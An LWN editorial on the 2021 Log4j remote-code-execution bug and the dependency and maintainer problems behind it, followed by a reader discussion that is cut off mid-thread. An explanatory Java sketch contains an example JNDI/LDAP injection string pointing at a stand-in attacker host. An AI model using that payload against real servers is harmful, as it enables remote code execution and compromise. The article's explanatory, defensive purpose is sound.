
Lessons from Log4j

By Jonathan Corbet
December 16, 2021
By now, most readers will likely have seen something about the Log4j vulnerability that has been making life miserable for system administrators since its disclosure on December 9. This bug is relatively easy to exploit, results in remote code execution, and lurks on servers all across the net; it is not hyperbolic to call it one of the worst vulnerabilities that has been disclosed in some years. In a sense, the lessons from Log4j have little new to teach us, but this bug does highlight some problems in the free-software ecosystem in an unambiguous way.

What went wrong

There are a lot of articles describing the mechanics of this bug and how to exploit it in great detail; see this page for an extensive collection. In short: Log4j is a Java logging package distributed by the Apache Software Foundation. It has found its way into many other projects and turns up all over the Internet. Indeed, according to this article, Log4j has been downloaded over 28 million times in the last four months alone, and is a dependency for nearly 7,000 other projects. So a vulnerability in Log4j is likely to become a vulnerability in many other systems that happen to use it.

As the Apache Software Foundation proudly tweeted in June, it's even on the Ingenuity helicopter on Mars.

Normally, one expects a logging utility to accept the data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it. One thing it can do is query remote servers for data and include the result in the log message. It can, for instance, obtain and incorporate data from an LDAP server, a feature that might be useful when one wants to add information about a user's account to the log.
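
To make that "interprets the data" behavior concrete, here is a minimal sketch (the class name and message are hypothetical, and it assumes the log4j-api and log4j-core 2.x jars from before the December fixes on the classpath): a ${...} lookup embedded in the message itself is expanded rather than recorded literally.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LookupDemo {
        private static final Logger logger = LogManager.getLogger(LookupDemo.class);

        public static void main(String[] args) {
            // On vulnerable Log4j 2 releases, the "${java:version}" token is
            // resolved by a lookup while the message is formatted, so the log
            // line contains the running Java version, not the literal text.
            logger.error("startup check: ${java:version}");
        }
    }

The JNDI lookup, which can reach out to an LDAP server, is just one more entry in that same lookup mechanism.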

It turns out, though, that the remote directory server can supply other things, including serialized Java objects that will be reconstituted and executed. That turns this feature into a way to inject code into the running application that, presumably, only wanted to log some data. To exploit this opening, an attacker needs to do two things:

  • Put up a server running a suitable protocol in a place where the target system can reach it. LDAP seems to be the protocol of choice at the moment, but others are possible; a grep of LWN's logs shows attempts to use DNS as well.
  • Convince the target system to log an attacker-supplied string containing the incantation that will load and execute the object from the malicious server.

The second step above is often easier than it might seem; many systems will happily log user-supplied data. The hostile string may take the form of a user name that ends up in the log; the browser's user-agent string also seems to be a popular choice. Once the target takes the bait and logs the malicious string, the game is over.
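
As a rough illustration of the attack path, here is a minimal sketch of the vulnerable pattern (not code from any real project; the class, method, and attacker host are hypothetical, and it again assumes a log4j-core 2.x release from before the fixes):

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LoginHandler {
        private static final Logger logger = LogManager.getLogger(LoginHandler.class);

        void recordAttempt(String userAgent) {
            // If an attacker sends a User-Agent header such as
            //   ${jndi:ldap://attacker.example.com/a}
            // vulnerable Log4j versions resolve the JNDI lookup while formatting
            // this message, contact the attacker's LDAP server, and may load and
            // run the object that comes back.
            logger.info("login attempt, user-agent: {}", userAgent);
        }
    }

Nothing in the application's own code looks obviously dangerous here, which is a large part of why the bug is so pervasive.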

This is, in other words, a case of interpreting unsanitized data supplied by the Internet, with predictable consequences; it is a failure that should have been caught in any reasonable review process. Note that the malicious strings can also be passed by front-end software to internal systems, which might then decide to log them. That means not being directly exposed to the Internet is not necessarily a sufficient defense for vulnerable systems. Every system using Log4j needs to be fixed, either by upgrading or by applying one of the other mitigations found in the above-linked article. Note that the initial fixes have proved to be insufficient to address all of the problems in Log4j; users will need to stay on top of the ongoing stream of updates.

The reaction to this vulnerability has been swift and strong. Some commenters are asserting that "open source is broken". Anybody who hadn't seen xkcd #2347 before has probably encountered it by now. Has our community failed as badly as some would have it? In short, there would appear to be two broad shortcomings highlighted by this episode, relating to dependencies and maintainers.

Dependencies galore

In the early days of free software, there simply was not much free code out there, so almost everything had to be written from scratch. At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.

For as long as your editor has been in this field — rather longer than he cares to admit — developers and academics both have talked about the benefits of reusable software. Over the years, that dream has certainly been accomplished. Many language communities have accumulated a massive collection of modules for many common (and uncommon) tasks; writing a program often just becomes an exercise in finding the right modules and gluing them together correctly. Interfaces to repositories automate the process of fetching the necessary modules (and the modules they depend on). For those of us who, long ago, became used to the seemingly infinite loop of running configure then tracking down the next missing dependency, modern environments seem almost unfair. The challenge is gone.

This is a huge success for our community; we have created development environments that can be a joy to work within, and which allow us to work at a level of productivity that couldn't really be imagined some decades ago. There is a problem lurking here, though: this structure makes it easy for a project to accumulate dependencies on outside modules, each of which may bring some risks of its own. When you are, essentially, importing random code off the Internet into your own program, any of a number of things can happen. One of those modules could be overtly hostile (as happened with event-stream), it could simply vanish (left-pad), or it could just suffer from neglect, as appears to have happened with Log4j.

When the quality of the things one consumes is of concern, one tends to fall back to known brands. Log4j is developed under the Apache Software Foundation brand which, one might hope, would be an indicator of quality and active maintenance. Appearances can be deceiving, though; one need not look further than Apache OpenOffice, which continues to be downloaded and used despite having been almost entirely starved of development effort for years, for an example. OpenOffice users will be relieved to know, though, that (according to the project's October 2021 report) OpenOffice has finally managed to put together a new draft mission statement. Log4j is a bit more active than that, but it still depends on the free-time effort of unpaid maintainers. Apache brand or not, this project, which is widely depended on, has nobody paid to maintain it.

But, even if the brand signals were more reliable, the problem remains that it is hard to stay on top of hundreds of dependencies. A library that appeared solid and well maintained when it was adopted can look rather less appealing a year or two later, but projects lacking good maintenance often tend not to attract attention until something goes badly wrong. Users of such a project may not understand the increasing level of risk until it is too late. Our tooling makes adding dependencies easy (to the point that we may not even be aware of them); it is less helpful when it comes to assessing the maintenance state of our existing dependencies.

Maintainers

A related problem is lack of development and maintenance support for projects that are heavily depended on. The old comparison between free software and a free puppy remains on point; puppies are wonderful, but if somebody isn't paying attention they will surely pee on the carpet and chew up your shoes. It is easy to take advantage of the free-of-charge nature of free software to incorporate a wealth of capable code, but every one of those dependencies is a puppy that needs to be under somebody's watchful eye.

As a community, we are far better at acquiring puppies than we are at training them. Companies will happily take the software that is offered, without feeling the need to contribute back even to the most crucial components in their system. Actually, we all do that; there is no way for anybody to support every project that they depend on. We all get far more out of free software than we can possibly put back into it, and that is, of course, a good thing.

That said, there is also a case to be made that the corporate side of our ecosystem is too quick to take the bounty of free software for granted. If a company is building an important product or service on a piece of free software, it behooves that company to ensure that said software is well supported and, if need be, step up to make that happen. It is the right thing to do in general, but it is far from an altruistic act; the alternative is a continual stream of Log4j-like crises. Those, as many companies are currently discovering, are expensive.

"Stepping up" means supporting maintainers as well as developers; it is with maintainers that the problem is often most acute. Even a project like the Linux kernel, which has thousands of developers who are paid for their work, struggles to find support for maintainers. Companies, it seems, see maintainership work as overhead at best, helping competitors at worst, and somebody else's problem in any case. Few companies reward their employees for acting as maintainers, so many of them end up doing that work on their own time. The result is projects with millions of downloads whose maintenance is done in somebody's free time — if it is done at all.

These problems are not specific to free software; discovering that a piece of proprietary software is not as well supported as was claimed is far from unheard of. Free software, at least, can be fixed even in the absence of cooperation from its creators. But the sheer wealth of software created by our community makes some of these problems worse; there is a massive amount of code to maintain, and little incentive for many of its users to help make that happen. We will presumably get a handle on these issues at some point, but it's not entirely clear how; until that happens, we'll continue deploying minimally supported software to Mars (and beyond).



it's even on the Ingenuity helicopter on Mars

Posted Dec 16, 2021 17:26 UTC (Thu) by beckmi (subscriber, #87001) [Link] (2 responses)

Do we now have to hope that Mars hasn't hacked us yet?
How credible are the images from Ingenuity now?
Where is Perseverance going?
;)

it's even on the Ingenuity helicopter on Mars

Posted Dec 16, 2021 23:09 UTC (Thu) by benhoyt (subscriber, #138463) [Link] (1 responses)

It seems very likely to me that NASA has thought about this issue, and there's no way to send public user input to Ingenuity. A NASA Ingenuity staff member could almost certainly exploit it, but they could probably also take down the helicopter any time by sending a code update too. I definitely don't have any insider info on this, so would be keen to hear more about Ingenuity's software and network security measures if anyone has a link.

it's even on the Ingenuity helicopter on Mars

Posted Dec 17, 2021 10:17 UTC (Fri) by georgm (subscriber, #19574) [Link]

Hold a sheet of paper with a prepared message in front of the camera of Ingenuity and hope they log some OCR results ;)

Lessons from Log4j

Posted Dec 16, 2021 17:49 UTC (Thu) by dskoll (subscriber, #1630) [Link] (3 responses)

OpenOffice has finally managed to put together a new draft mission statement

Burn... :)

Lessons from Log4j

Posted Dec 16, 2021 17:55 UTC (Thu) by smurf (subscriber, #17840) [Link] (1 responses)

Their sincerity will entirely be measured by how close that statement will be to "we admit that the whole AOo mess has been a load of disingenuous BS and the subproject is hereby disbanded".

Lessons from Log4j

Posted Dec 16, 2021 20:22 UTC (Thu) by NYKevin (subscriber, #129325) [Link]

The linked minutes do not suggest that they plan to do that. In fact, they say that they are now publishing AOO in the Microsoft Store, although when I searched for it, I was only able to find a third-party repackaged version (with a list price of $70, "discounted" to $10, so someone is apparently making a killing off of this...). There was also one for LibreOffice, which is apparently cheaper at $10, "discounted" to $4.60.

Lessons from Log4j

Posted Dec 17, 2021 8:51 UTC (Fri) by thoeme (subscriber, #2871) [Link]

RE: OpenOffice. This reminded me of LibreOffice and my use of it on my Linux machines (not every day, but still frequently enough), so I sent them (*LibreOffice*) a financial Christmas present.

Lessons from Log4j

Posted Dec 16, 2021 18:13 UTC (Thu) by pj (subscriber, #4506) [Link] (1 responses)

>Companies, it seems, see maintainership work as overhead at best, helping competitors at worst,

Companies see it that way because developers see it that way: most developers consider their job to be 'writing code'... but it's more than that: it's debugging, it's testing, it's ticket-status updates (be it a bug ticket or a feature 'ticket'), it's code review (really just a form of pre-emptive debugging), etc. While writing code may be the most enjoyable part of the job - who doesn't like a good dose of flow state? - it's certainly not the _entire_ job, and that message needs to be spread around more.

Lessons from Log4j

Posted Dec 16, 2021 21:40 UTC (Thu) by hkario (subscriber, #94864) [Link]

Exactly, good engineering is boring, and people don't like boring work (see also: List of discontinued Google products).

I'm sure that there are dozens upon dozens of similarly under-maintained proprietary libraries in the corporate world, but because they're closed source, nobody is looking for bugs in them, and even if the "red team" does find one, hardly anyone will learn that lack of maintenance was the root cause.

Lessons from Log4j

Posted Dec 16, 2021 18:21 UTC (Thu) by rgmoore (✭ supporter ✭, #75) [Link] (1 responses)

At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.

I just wanted to highlight this aside as an example of the kind of thing that keeps me a subscriber. The wit is very dry, but we do notice and enjoy it. Keep up the good work!

Lessons from Log4j

Posted Dec 21, 2021 11:00 UTC (Tue) by fmyhr (subscriber, #14803) [Link]

Seconded! That was my favorite section of this excellent article. :-)

All the same, I wish our Editor could have worked in the name of (and better yet, a link to) LibreOffice. The dig at OO was very much deserved, but perhaps too subtle for those unfamiliar with the situation. Which, let's face it, could be any reader -- given how large the "firehose" has become.

Lessons from Log4j

Posted Dec 16, 2021 19:09 UTC (Thu) by mtaht (subscriber, #11087) [Link] (3 responses)

When Red Hat went public, they gave out 500 shares to everyone who had made a kernel contribution. Had that become a model for other companies building on open source software, we'd all be comfortably maintaining and improving our code today, and teaching and paying the next generation to take over.

Lessons from Log4j

Posted Dec 17, 2021 9:38 UTC (Fri) by LtWorf (subscriber, #124958) [Link] (2 responses)

Companies: "Please use MIT license to widen adoption"
Also companies: "We will never contribute any code or money to your project"

Lessons from Log4j

Posted Dec 18, 2021 23:40 UTC (Sat) by NYKevin (subscriber, #129325) [Link] (1 responses)

Also also companies: "Your software (that we haven't paid for) is poorly maintained and lacks [feature X], please improve it."

Lessons from Log4j

Posted Dec 20, 2021 18:29 UTC (Mon) by jengelh (guest, #33263) [Link]

I'll bite. As seen from the perspective of businesses, end-users also be like: "I really like the FLOSS software you make. Your project lacks some $X and it would be really important to me to start a subscription/whatever, but because it's missing I am hesitant to effectively make $X happen either by way of a patch or the aforementioned subscription."

Lessons from Log4j

Posted Dec 16, 2021 19:32 UTC (Thu) by cyperpunks (subscriber, #39406) [Link] (8 responses)

Is it really a maintainer problem? Or is it an intrinsic problem in the design of Java?

https://twitter.com/isotopp/status/1470668771962638339

Standing on the fragile shoulders of giants

Posted Dec 16, 2021 22:41 UTC (Thu) by noxxi (subscriber, #4994) [Link] (4 responses)

log4j just has the same philosophy as the Java stack it is built on: flexibility trumps security.

It is not that log4j enables the code execution - it is instead the permissive design of JNDI combined with the powerful and known-problematic object deserialization of Java. None of this is new - log4j just made it more accessible for exploits. It wasn't the first time that these mechanisms were found to be exploitable, and I doubt it will be the last.

Standing on the fragile shoulders of giants

Posted Dec 17, 2021 13:39 UTC (Fri) by developer122 (guest, #152928) [Link] (1 responses)

All of that would not have occurred without a double evaluation vulnerability.

Standing on the fragile shoulders of giants

Posted Dec 18, 2021 19:18 UTC (Sat) by ms-tg (subscriber, #89231) [Link]

Agree, this is Both-And, rather than either-or

Standing on the fragile shoulders of giants

Posted Dec 17, 2021 13:43 UTC (Fri) by k3ninho (subscriber, #50375) [Link] (1 responses)

>It is not that log4j enables the code execution
I can't get past this thought. Arguably it *is* that log4j treats logged strings as anything other than dead data to log, but a common pattern involves anonymous functions streaming to StringBuilder inside the logging method. When that's allowable, the community is unwittingly enabling the creation of a culture where you *can* follow this pattern so nobody trains StackOverflow with answers why it's a bad idea to follow that pattern.

The best response to this is to talk about user/attacker-supplied data as something you expect to be an attack vector, set the expectation that we restrict the processing of that input data to simple substitutions. Talk about the Chomsky Hierarchy, with strong warnings against Turing Completeness, so that people don't create processing of hostile data that's exploitable. If we talk about those things, the cultural expectations change so people will ask "how can this user-supplied input work against me?"

K3n.

Standing on the fragile shoulders of giants

Posted Dec 18, 2021 2:21 UTC (Sat) by ssmith32 (subscriber, #72404) [Link]

You don't need to follow that pattern to exploit this. Simply logging unsanitized, user-controlled data with log4j is what allows this.

And you do need to be running a version of the JVM/JDK (1.8, and actually a few patch versions behind the latest 1.8) that has been deprecated/unsupported for a few years now.

At least to exploit it in the fashion being described everywhere. Later versions of the JVM/JDK reportedly are still vulnerable, but you need to use in-memory gadgets, which is a bit harder than running code off an LDAP server you host.

Although I have to wonder how many attackers set up an LDAP server to host their attacks... that was running on an old version of the JVM... that used log4j...

Lessons from Log4j

Posted Dec 18, 2021 2:23 UTC (Sat) by ssmith32 (subscriber, #72404) [Link] (1 responses)

It's not intrinsic to the design of Java. In fact, the JDK/JVM fixed this path a while ago. But people like running on deprecated JVMs...

Lessons from Log4j

Posted Dec 21, 2021 16:26 UTC (Tue) by msw (guest, #3733) [Link]

There is some misinformation running around that newer versions of the JVM "fix" the problem through changing the defaults for com.sun.jndi.cosnaming.object.trustURLCodebase and com.sun.jndi.rmi.object.trustURLCodebase. Those protections are incomplete, depending on the application and its dependencies. For example, the XBean BeanFactory that is bundled with Tomcat is a known attack vector when combined with the Log4j problems, even when you are running on the latest JVMs with the more secure defaults. Ref: https://www.openwall.com/lists/oss-security/2021/12/10/2

Lessons from Log4j

Posted Dec 18, 2021 22:42 UTC (Sat) by gfernandes (subscriber, #119910) [Link]

You mean bad design like this?
http://yosefk.com/c++fqa/

Lessons from Log4j

Posted Dec 16, 2021 20:15 UTC (Thu) by erwaelde (subscriber, #34976) [Link]

> A related problem is lack of development and maintenance support for projects that are heavily depended on.

I'm not sure this is the whole thing. Reviewing or auditing "free (beer)" components from external sources is not high on the priority list of (project) management. In my humble opinion this is a big part of this mess.

Lessons from Log4j

Posted Dec 16, 2021 20:21 UTC (Thu) by HenrikH (subscriber, #31152) [Link] (13 responses)

"open source is broken" - Quite rich considering the amount of proprietary software that apparently had zero problems incorporating Log4j... On a more serious note I fail to see how a proprietary version of Log4j would make any difference what so ever.

Lessons from Log4j

Posted Dec 16, 2021 20:48 UTC (Thu) by rahulsundaram (subscriber, #21946) [Link] (4 responses)

> On a more serious note, I fail to see how a proprietary version of Log4j would make any difference whatsoever

Far less adoption would have made a large difference.

Lessons from Log4j

Posted Dec 17, 2021 9:04 UTC (Fri) by eru (subscriber, #2753) [Link] (1 responses)

On an alternate timeline with no open source, small shared components like log4j would not exist (never mind trivialities like the infamous left-pad). Licensing them would be too much bother, so purchases would be done only for larger pieces of software. Instead, companies would use the facilities in the OS or language runtime they use, and if not sufficient, roll their own.

In general, the alternate timeline would have less, and more expensive software. Hard to say if it would be of higher quality.

Lessons from Log4j

Posted Dec 28, 2021 15:40 UTC (Tue) by jd (guest, #26381) [Link]

In theory, we can judge whether it would be higher quality by looking at defect density.

I found a report from 2013 which states: "Code quality for open source software continues to mirror code quality for proprietary software: For the second consecutive year, code quality for both open source and proprietary software code was better than the generally accepted industry standard defect density for good quality software of 1.0. defect density (defects per 1,000 lines of code, a commonly used measurement for software quality). Open source software averaged a defect density of .69, while proprietary code (a random sampling of code developed by enterprise users) averaged .68."

Open Source did better, according to another report: "In fact, the most recent report (2013) found open source software written in C and C++ to have a lower defect density than proprietary code. The average defect density across projects of all sizes was 0.59 for open source, and 0.72 for proprietary software."

Yet other reports give other figures. "Defect density (defects per 1,000 lines of code) of open source code and commercial code has continued to improve since 2013: When comparing overall defect density numbers between 2013 and 2014, the defect density of both open source code and commercial code has continued to improve. Open source code defect density improved from 0.66 in 2013 to 0.61 in 2014, while commercial code defect density improved from 0.77 to 0.76."

Bear in mind that all three reports are basing their 2013 figures on the same 2013 analysis by Coverity and all three manage to give different numbers. Since the link to Coverity's report no longer works, I cannot tell you if any of them are correct.

Nonetheless, two of the three give better defect density levels to open source software, with the third being essentially equal. We can certainly use that to say that the commercial software examined certainly wasn't better and may have been worse. Of course, a lot can happen in 8 years, almost 9, and I can't find anything later than 2014.

So if we can't rely on tech articles, maybe we can look at methodology. Power of Ten and the CERT Guidelines for Secure Software would seem logical places to start. I do not, personally, know anyone who adheres to either and I've worked for a decent selection of companies. However, anecdotal evidence isn't worth much and it could be that everywhere else on the planet does. It may be a decent selection, but it's not really random and it's certainly not verifiable. Are there any surveys out there? Then there are rulesets like MISRA, which has fans and haters.

PRQA seems to have been seized by Perforce and previously free-to-read coding standards now seem to be locked up, so I have no idea what they currently are. ( The 2005 JSF rules are here: https://www.stroustrup.com/JSF-AV-rules.pdf - if they're as rapidly developing as Lockheed-Martin imply in one online presentation, these are well out of date.) All I can tell you with any confidence is that no open source coder, and very few professionals, have bought the Perforce suite as their software control system and are using the code analyzer to spot defects. It may be possible to use Helix QAC with Git, but I don't see anything to indicate that.

What I'm getting out of this is that the scene is messy, that a fair amount of the advice is apocryphal or at least wildly inaccurate (so a great starting point for budding galactic hitchhikers), that very few people are using the tools that do exist and that even when everything meshes just right, nobody seems to know what the results are.

I do sincerely hope that it's not as bleak as all that, but I'm worried it might actually be worse.

Lessons from Log4j

Posted Dec 18, 2021 2:25 UTC (Sat) by ssmith32 (subscriber, #72404) [Link] (1 responses)

Ah I see. We just need to stop using programmable Turing machines, and we'll be fine :P

Lessons from Log4j

Posted Dec 18, 2021 10:06 UTC (Sat) by Wol (subscriber, #4433) [Link]

Yup. When all you have is a hammer everything looks like a nail ...

Recognise a Turing Machine for what it is - a security nightmare. And DON'T USE IT WHEN IT'S NOT APPROPRIATE.

Cheers,
Wol

Lessons from Log4j

Posted Dec 17, 2021 10:33 UTC (Fri) by rsidd (subscriber, #2582) [Link] (7 responses)

The "brokenness" in the linked article refers to the same thing the xkcd cartoon refers to. ie, not the code itself, but the freeloaders who don't contribute back, and turn one guy's spare-time project into a critical brick supporting the internet.

Lessons from Log4j

Posted Dec 17, 2021 14:55 UTC (Fri) by ebassi (subscriber, #54855) [Link] (6 responses)

> freeloaders who don't contribute back

Isn't that the entire point of "open source software" as opposed to "free software"?

Lessons from Log4j

Posted Dec 17, 2021 16:08 UTC (Fri) by mathstuf (subscriber, #69389) [Link] (5 responses)

Eh, nothing in "free software" requires that the code actually be contributed back (with whatever gauntlet needs to be run to do that), just available. And sure, it'd be available, but I imagine it would usually be a "pull" policy rather than a "push" policy for any actors which don't do it under "open source" already.

Lessons from Log4j

Posted Dec 17, 2021 17:37 UTC (Fri) by pebolle (guest, #35204) [Link] (3 responses)

> Eh, nothing in "free software" requires that the code actually be contributed back [...] just available.

Exactly.

Free Software proponents are, or at least should be, fine with people only consuming Free Software. I think not contributing, not funding, not reporting bugs, etc. should all be acceptable to them. Their philosophy is that all software should be free.

Open Source's philosophy is that Open Source will lead to higher quality software.

From a Free Software perspective accidents like this are not special. Its supporters like bug-free software, just like everyone else! From an Open Source perspective accidents like this are more challenging. They are at odds with their philosophy.

Lessons from Log4j

Posted Dec 20, 2021 18:30 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (1 responses)

The Open Source response is essentially that there's no free lunch. When an open source project is poorly maintained, this is often a result of nobody contributing to it. Compared on equal terms, open source development is superior to proprietary development, but in order for that to be a fair comparison, you need to be throwing equal amounts of time, money, and person-hours at both methods. In practice, many companies are unwilling to do that, but that's not a failing in open source itself.

Lessons from Log4j

Posted Dec 20, 2021 23:36 UTC (Mon) by pebolle (guest, #35204) [Link]

> The Open Source response is essentially that there's no free lunch. When an open source project is poorly maintained, this is often a result of nobody contributing to it.

Am I reading you in bad faith if I say this translates to: if you open sourced harder it wouldn't have happened?

> Compared on equal terms, open source development is superior to proprietary development

I was taught that Open Source was a reaction to Free Software. Both are alternatives to proprietary software, of course, but Open Source should be evaluated on its promise to yield better results while Free Software on its promise to yield more freedom.

(I think LWN.net almost never covers software that is Open Source but not Free Software so let's ignore that niche.)

My point was that in cases like this, where (free and open) software turns out to be buggy, the proponents of Open Source have some explaining to do. And "open source harder" explains very little, as it will always be true.

Lessons from Log4j

Posted Dec 21, 2021 9:40 UTC (Tue) by drnlmza (subscriber, #60245) [Link]

> Free Software proponents are, or at least should be, fine with people only consuming Free Software. I think not contributing, not funding, not reporting bugs, etc. should all be acceptable to them. Their philosophy is that all software should be free.

Sure, not contributing back is fine, but there's also a corresponding "no warranty" clause in most licenses. The problem is no one contributing back and everyone expecting that all problems will magically be fixed without any active effort, which is not how the world works.

Lessons from Log4j

Posted Dec 17, 2021 19:04 UTC (Fri) by Wol (subscriber, #4433) [Link]

And there's no obligation in Free Software to contribute back, either.

There is an obligation to contribute *forward*, but that's subtly (and critically) different.

Cheers,
Wol

Dependency bundling

Posted Dec 16, 2021 20:38 UTC (Thu) by bkw1a (subscriber, #4101) [Link] (36 responses)

I hope that after these fires have been put out we all sit down and have a serious re-think about the downside of bundling dependencies. If the current problem could just be solved by installing one upgraded package it would be much less serious. Instead, scanning a random workstation I find 41 separate instances of log4j. There are clearly advantages to bundling up all of the dependencies in your installation kit, but eventually we run into situations like this, where every piece of software using a dependency has to issue its own, separate update.

In the Windows and Mac world there's never been good package management, so this kind of thing is inevitable. It would be great if the current crisis encourages developers in that realm to think about how that can be improved.

But even in the Linux world we're leaning more and more on snaps and flatpaks, making such problems more likely there, too. These tools are great, but we need to think about the trade-offs and be prepared to deal with the consequences.

The problem is, we don't just have one unsupervised puppy, we have 101 Dalmatians.

Dependency bundling

Posted Dec 16, 2021 21:03 UTC (Thu) by developer122 (guest, #152928) [Link] (19 responses)

Minor note, but it would indeed have been nice if we could fix once, update everywhere.

Dependency bundling

Posted Dec 17, 2021 7:43 UTC (Fri) by ras (subscriber, #33059) [Link] (18 responses)

This is trite, but as a DD I feel compelled to say - you have heard of Debian?

It's a Linux distribution that, afaict, is staffed mostly by sysadmins.

Some sysadmins are so anal about the "fix once, update everywhere" thing they have rules like: all software installed on my production boxes is either written in house, or is installed via a .deb with the dependencies supplied by Debian packages. Don't have a .deb - make one yourself. With ed, if necessary.

Every so often a young wet-behind-the-ears programmer will insist to a wizened sysadmin that this bureaucracy from last fortnight is stifling his creativity, and the wizened sysadmin's eyebrows will quiver, rising above his monitor so the bristles point straight towards the young'in's eyeballs, and with a long soft sigh in his voice he will say "get off my lawn and keep that attitude away from my metal, kid".

And the kid will do just that, setting up the smoothest and slickest web site you ever did see running completely serverless, and he will monitor everything with log4j, occasionally glancing at it with his ipady thingy while sipping coconut juice prepared by a sweet young thing in a shady spot with good 5G; and thusly and surely, his users' private data will make its way to the dark corners of the web where they make good money trading such things.

And the newspapers will have headlines demanding justice and vengeance against the nerds who had the gall to create the systems the users love to use and do it in internet time. And then after due consideration another nerd will say "why don't we do fix once update everywhere?".

Dependency bundling

Posted Dec 17, 2021 8:13 UTC (Fri) by joib (subscriber, #8541) [Link] (15 responses)

Insert "Old man yells at cloud meme".

Perhaps distros could engage in some introspection why developers have abandoned relying on the distro packages to the extent they have, and what could distros do about it? Bonus points if you can do it without the kneejerk CADT response.

Dependency bundling

Posted Dec 17, 2021 10:04 UTC (Fri) by LtWorf (subscriber, #124958) [Link] (3 responses)

People are lazy.

Nobody will follow best practices if they are not enforced.

Of course product management is happier to bundle stuff, because it leads to being faster. And developers are fine with that because they won't need to learn how to package software.

Everyone is happy until disaster happens :D

Dependency bundling

Posted Dec 18, 2021 2:30 UTC (Sat) by ssmith32 (subscriber, #72404) [Link] (1 responses)

Yeah, but if running outdated JVMs because the latest are available as debs on "stable" is what makes you vulnerable.. because you're too lazy to emerge your whole system from the latest source every night ..

People have very different ideas of best practice..

Dependency bundling

Posted Dec 18, 2021 16:30 UTC (Sat) by LtWorf (subscriber, #124958) [Link]

Distributions all have security teams and ship fixes to the packages.

On the other hand version pinning makes sure that security fixes will never reach your product.

Dependency bundling

Posted Dec 18, 2021 11:02 UTC (Sat) by Wol (subscriber, #4433) [Link]

> Nobody will follow best practices if they are not enforced.

(1) Because "best practice" often isn't.
(2) Because if you're young (and "foolish") you don't understand the concept.
(3) Because if you haven't been burnt you don't see the point.
And, rather importantly
(4) if you're a manager it's someone else's problem...

That's why greybeards do it and newbies don't ...

Cheers,
Wol

Dependency bundling

Posted Dec 17, 2021 20:40 UTC (Fri) by khim (subscriber, #9252) [Link] (9 responses)

> Bonus points if you can do it without the kneejerk CADT response.

Even if it is the reason for that phenomenon?

> Perhaps distros could engage in some introspection why developers have abandoned relying on the distro packages to the extent they have

Because it's the only way to create a cross-distro and cross-version binary. And that's what you want both if you want to give your program to users (most of whom are not programmers and don't know how to compile anything) and if you want to use the program in-house and retain the ability to upgrade the OS without hassle (an attempt to rely on distro-provided libraries would lead to pain with installation on an upgraded OS, because certain versions of certain libraries would become unavailable).

> and what could distros do about it?

An SDK. Some way to build a binary which you may build once and use forever. Or, if not forever, then at least for 5-10 years.

That's what all OSes are providing, just not Linux distributions.

That's the bare minimum. If you want to make sure developers wouldn't try to bundle libraries which are not in your base SDK, then you would need some cross-distro and cross-version way to deliver other libraries.

That's even harder; I don't know of any OS which has managed to pull that off. Flatpak is trying, AFAIK.

Dependency bundling

Posted Dec 18, 2021 11:31 UTC (Sat) by joib (subscriber, #8541) [Link] (1 responses)

> Even if it is the reason for that phenomenon?

Yes. Because insulting developers will only alienate developers further and ensures that whatever good points distros might have about maintainability and dependency management will fall on deaf ears.

> An SDK.

> Flatpak is trying, AFAIK.

Yes, something like that. Flatpak is probably the best shot in the desktop space.

In the server world, I don't know. Developers using "modern" languages really love things like cargo+crates.io/NPM/whatever, and for good reasons. The challenge is how to integrate those models with some trusted third party (call it a "distro" or whatever) that would ensure long-term maintenance and security updates for particular versions of particular packages. Oh, and some kind of "apt-get upgrade" type mechanism to semi-automatically rebuild applications with bundled dependencies when there are security updates in those dependencies.

Dependency bundling

Posted Dec 18, 2021 23:52 UTC (Sat) by NYKevin (subscriber, #129325) [Link]

> Yes. Because insulting developers will only alienate developers further and ensures that whatever good points distros might have about maintainability and dependency management will fall on deaf ears.

For $DEITY's sake, even Steve Ballmer had this figured out. Remember the "Developers, developers, developers!" line? You could have the greatest operating system in the world, but it doesn't matter if nobody wants to write code for it.

Dependency bundling

Posted Dec 19, 2021 0:43 UTC (Sun) by NYKevin (subscriber, #129325) [Link] (6 responses)

> If you want to make sure developers wouldn't try to bundle libraries which are not in your base SDK, then you would need some cross-distro and cross-version way to deliver other libraries.

In the proprietary world, this is a solved problem. It's called "You can't bundle it or else our lawyers will sue your pants off. Instead, every end user must download the package from upstream, which is installed in a single standard location, and if your OS/app/whatever doesn't like that standard location, then that's your problem."

Before anyone asks: New versions are handled as if they were entirely unrelated packages. You can easily end up with dozens of these "Microsoft C++ Redistributable" nonsense packages on a single Windows box.

Dependency bundling

Posted Dec 19, 2021 1:11 UTC (Sun) by khim (subscriber, #9252) [Link] (3 responses)

Except, of course, these runtimes not only can be bundled, but were designed to be bundled from the very early days. And yes, they sometimes needed crazy tricks to support these bundled runtimes.

Yet you always had an option to bundle them and you still have that option even today.

> Instead, every end user must download the package from upstream, which is installed in a single standard location, and if your OS/app/whatever doesn't like that standard location, then that's your problem.

They only tried to push that approach after taking 90%+ of the desktop. After they achieved, essentially, a monopoly. And even then the end result was a near disaster: that's how they lost the title of leading desktop platform to the web (ironically enough, after killing Netscape).

And the web, the platform that for now holds the title of most popular desktop platform, is all about bundling dependencies.

GNU/Linux never had a monopoly, yet it tried to put much harsher requirements on developers. This flew like a lead balloon: most apps today are developed for the web or for Windows and macOS; only a tiny percentage supports Linux.

Dependency bundling

Posted Dec 19, 2021 2:57 UTC (Sun) by NYKevin (subscriber, #129325) [Link] (2 responses)

IMHO that doesn't count as "bundling" because, in most cases, at least on modern systems, the thing that is bundled is a binary blob self-extracting installer you got from upstream, and you are in no way allowed to just install random DLLs into your Program Files directory. The installer puts the library in a fixed place, ergo every user's machine has exactly one copy of it... that is, one per backwards-incompatible version of the silly thing, so in practice twelve-ish.

Sometimes, there isn't even a reasonable way to determine whether the thing is already installed or not, so you end up doing extra-crazy things like re-running the same installer over and over again (see https://help.steampowered.com/en/faqs/view/2BED-4784-8C0A...).

Dependency bundling

Posted Dec 19, 2021 14:19 UTC (Sun) by khim (subscriber, #9252) [Link] (1 responses)

